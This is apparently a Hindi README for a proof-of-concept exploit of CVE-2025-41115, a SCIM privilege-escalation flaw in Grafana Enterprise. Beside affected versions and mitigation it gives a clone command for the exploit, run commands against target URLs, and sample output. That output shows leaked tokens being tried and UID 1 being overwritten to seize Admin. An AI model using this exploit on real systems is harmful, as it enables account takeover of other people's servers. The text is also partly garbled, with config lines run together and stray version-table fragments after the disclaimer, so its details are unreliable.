
CVE-2025-41115

Grafana Enterprise में गंभीर SCIM विशेषाधिकार-वृद्धि भेद्यता
CVE-2025-41115, Grafana Enterprise में एक गंभीर (CVSS 10.0) भेद्यता है जो इसकी SCIM उपयोगकर्ता-प्रावधान सुविधा को प्रभावित करती है।
जब SCIM प्रावधान सक्षम हो और user_sync_enabled = true हो, तो एक दुर्भावनापूर्ण SCIM क्लाइंट एक संख्यात्मक externalId भेज सकता है, जिसे Grafana गलती से एक आंतरिक उपयोगकर्ता ID से मैप करता है — जिससे हमलावर मौजूदा खातों, जिनमें व्यवस्थापक शामिल हैं, को प्रतिरूपित या अधिलेखित कर सकता है।
⚠️ Grafana OSS प्रभावित नहीं है।
शोषण के लिए आवश्यक शर्तें:
enableSCIM = true[auth.scim] user_sync_enabled = true| संस्करण | स्थिति |
|---|---|
| 12.0.0 → 12.2.1 | ❌ असुरक्षित |
| 12.3.0 | ✅ पैच किया गया |
| 12.2.1 (पैच किया गया बिल्ड) | ✅ पैच किया गया |
💡 प्रबंधित Grafana सेवाएं (AWS/Azure/Grafana Cloud) विक्रेताओं द्वारा पैच की गईं।
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git
या बस उपरोक्त स्क्रिप्ट को किसी फ़ाइल में कॉपी-पेस्ट करें
chmod +x CVE-2025-41115.py
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com
जब एक्सप्लॉइट वास्तव में काम करता है (अर्थात, लक्ष्य असुरक्षित है और टोकन मान्य है), तो आपको बिल्कुल इस तरह आउटपुट दिखाई देगा: text
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
"schemas": [
"urn:ietf:params:scim:schemas:core:2.0:User"
],
"id": "1", ←←← THIS IS THE KEY LINE (UID 1 overwritten)
"externalId": "1",
"meta": { ... },
"userName": "[email protected]",
"name": {
"formatted": "Pwned User"
},
"emails": [
{
"value": "[email protected]",
"primary": true
}
],
"active": true
}
12.3.0 या किसी एक पैच किए गए अनुरक्षण रिलीज़ में अपडेट करें।
यदि आप SCIM प्रावधान का उपयोग नहीं कर रहे हैं, तो सुनिश्चित करें कि आपके पास है:
enableSCIM = false
या
[auth.scim]
user_sync_enabled = false
इनकी तलाश करें:
externalId उपयोगसुनिश्चित करें कि केवल विश्वसनीय पहचान प्रदाताओं को आपके SCIM एंडपॉइंट से बात करने की अनुमति है।
संदिग्ध लॉगिन, उपयोगकर्ता निर्माण घटनाओं, या व्यवस्थापक अधिग्रहण पर नज़र रखें।
यह PoC केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उपयोग के लिए है, विशेष रूप से उन प्रणालियों में जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत उपयोग अवैध है और आपराधिक अभियोजन का कारण बन सकता है। लेखक और वितरक दुरुपयोग के लिए कोई देयता नहीं लेते हैं। तुरंत पैच करें (≥12.0.6 / 12.3.0+)।
| 12.1.3 |
| ✅ पैच किया गया |
| 12.0.6 | ✅ पैच किया गया |